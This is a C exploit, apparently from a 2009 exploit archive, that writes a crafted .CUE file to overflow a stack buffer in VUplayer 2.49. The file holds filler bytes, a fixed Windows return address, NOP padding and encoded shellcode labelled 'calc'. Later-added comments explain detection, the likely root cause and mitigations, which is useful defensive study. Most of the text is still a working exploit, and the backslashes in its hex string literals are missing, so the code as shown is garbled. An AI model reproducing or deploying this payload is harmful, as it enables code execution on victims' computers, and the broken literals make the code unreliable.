
# Title : VUplayer 2.49 .CUE File Local Buffer Overflow Exploit
# Published : 2009-03-02
# Author : Assed Edin


/*

  Author: Assed Edin
  E-mail: storms0uth@hotmail.com
  GreetS : Xcracker & SimO-s0ft & Ga3 Drari Wlad MArrakech ^_^ o Manssawch Lyc???? Hassan2 & Str0ke
  
*/



#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <windows.h>
/*
 * Number of 0x90 filler bytes main() places in front of the 4-byte RET value.
 * NOTE(review): presumably the distance from the start of the overflowed
 * field to the saved return address in the target; not verifiable from
 * this file alone.
 */
#define OFFSET 1012


/*
 * Text written before the oversized field. The hex pairs in this literal,
 * read as ASCII codes, spell:  FILE "
 * i.e. the start of a CUE-sheet FILE entry up to its opening quote.
 */
char header1[]=     
"x46x49x4cx45x20x22";

/*
 * Text written after the oversized field. Read as ASCII codes, the hex pairs
 * spell:  .BIN" BINARY <CR><LF> TRACK 01 MODE1/2352 <CR><LF>   INDEX 01 00:00:00
 * so the finished file looks like an ordinary one-track CUE sheet.
 *
 * Detection note: the only unusual part of the resulting file is the quoted
 * name in the FILE entry, which is over a thousand bytes long and not
 * printable text. A content filter can flag .cue files whose FILE name
 * exceeds a normal path length or holds non-printable bytes.
 */
char header2[]= 
"x2ex42x49x4ex22x20x42x49x4ex41x52x59x0dx0ax20"
"x54x52x41x43x4bx20x30x31x20x4dx4fx44x45x31x2fx32"
"x33x35x32x0dx0ax20x20x20x49x4ex44x45x58x20x30x31"
"x20x30x30x3ax30x30x3ax30x30";
/*
 * Opaque payload string that main() appends after RET and NOP.
 * The author's label below is "calc 343"; presumably this marks a payload
 * that starts the Windows calculator as a visible proof of execution.
 * That cannot be confirmed from the bytes as listed here.
 */
//calc 343
char scode[]=
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x08"
"x99x23x82x83xebxfcxe2xf4xf4x71x67x82x08x99xa8xc7"
"x34x12x5fx87x70x98xccx09x47x81xa8xddx28x98xc8xcb"
"x83xadxa8x83xe6xa8xe3x1bxa4x1dxe3xf6x0fx58xe9x8f"
"x09x5bxc8x76x33xcdx07x86x7dx7cxa8xddx2cx98xc8xe4"
"x83x95x68x09x57x85x22x69x83x85xa8x83xe3x10x7fxa6"
"x0cx5ax12x42x6cx12x63xb2x8dx59x5bx8ex83xd9x2fx09"
"x78x85x8ex09x60x91xc8x8bx83x19x93x82x08x99xa8xea"
"x34xc6x12x74x68xcfxaax7ax8bx59x58xd2x60x69xa9x86"
"x57xf1xbbx7cx82x97x74x7dxefxfax42xeex6bx99x23x82";

/*
 * Short padding string placed between RET and scode. 0x90 is the x86
 * single-byte no-op, the same value main() uses to pre-fill the buffer.
 */
char NOP[]="x90x90x90x90";
/*
 * Writes the proof-of-concept file "wa33.cue" to the current directory.
 *
 * File layout, in write order:
 *   header1 | buffer | header2
 * where buffer is OFFSET bytes of 0x90, the 4 bytes of RET, the NOP string,
 * then the scode string. With header1/header2 decoded, this is one CUE-sheet
 * FILE entry whose quoted name carries the whole buffer.
 *
 * argc and argv are not used. Always returns 0.
 *
 * Defensive reading: the page title attributes this to a buffer overflow in
 * VUplayer 2.49's .CUE handling. The parser is not shown here, so the root
 * cause (presumably an unbounded copy of the FILE name into a fixed-size
 * stack buffer) is an inference. The application-side fix is a length check
 * on that field. /GS stack cookies, DEP and ASLR are the platform
 * mitigations aimed at the fixed-address return overwrite this file relies on.
 */
int main(int argc,char *argv[]){
  FILE *openfile;
  unsigned char *buffer;
  /*
   * Fixed 32-bit value copied into the buffer directly after the filler.
   * NOTE(review): presumably an address inside a module of one specific
   * Windows build; a hard-coded address like this is no longer valid once
   * module bases are randomized (ASLR).
   */
  unsigned int RET =0x7c836960;
  int offset=0;
  printf("Coded By Assad edin (Sat0rA-Cr3w - Moroccan Hackers)n");
  printf("Email : storms0uth@hotmail.comn");
  /* An open failure is reported with perror, but execution continues. */
  if ((openfile=fopen("wa33.cue","wb"))==NULL){
                                            perror("Canot open file");
                                            }
  /* Allocate room for filler + RET + NOP + scode and pre-fill it with 0x90. */
  buffer = (unsigned char *) malloc (OFFSET+4+strlen(NOP)+strlen(scode));
  memset(buffer,0x90,OFFSET+4+strlen(NOP)+strlen(scode));
  /* Skip the first OFFSET filler bytes, then lay the parts down in order. */
  offset=OFFSET;
  /* RET is copied as its in-memory representation (host byte order). */
  memcpy(buffer+offset,&RET,4);
  offset+=4;
  memcpy(buffer+offset,NOP,strlen(NOP));
  offset+=strlen(NOP);
  memcpy(buffer+offset,scode,strlen(scode));
  offset+=strlen(scode);
  /* Emit the CUE entry: opening text, oversized name, closing text. */
  fputs(header1,openfile);
  fputs(buffer,openfile);
  fputs(header2,openfile);
  fclose(openfile);
  free(buffer);
  return 0;
}
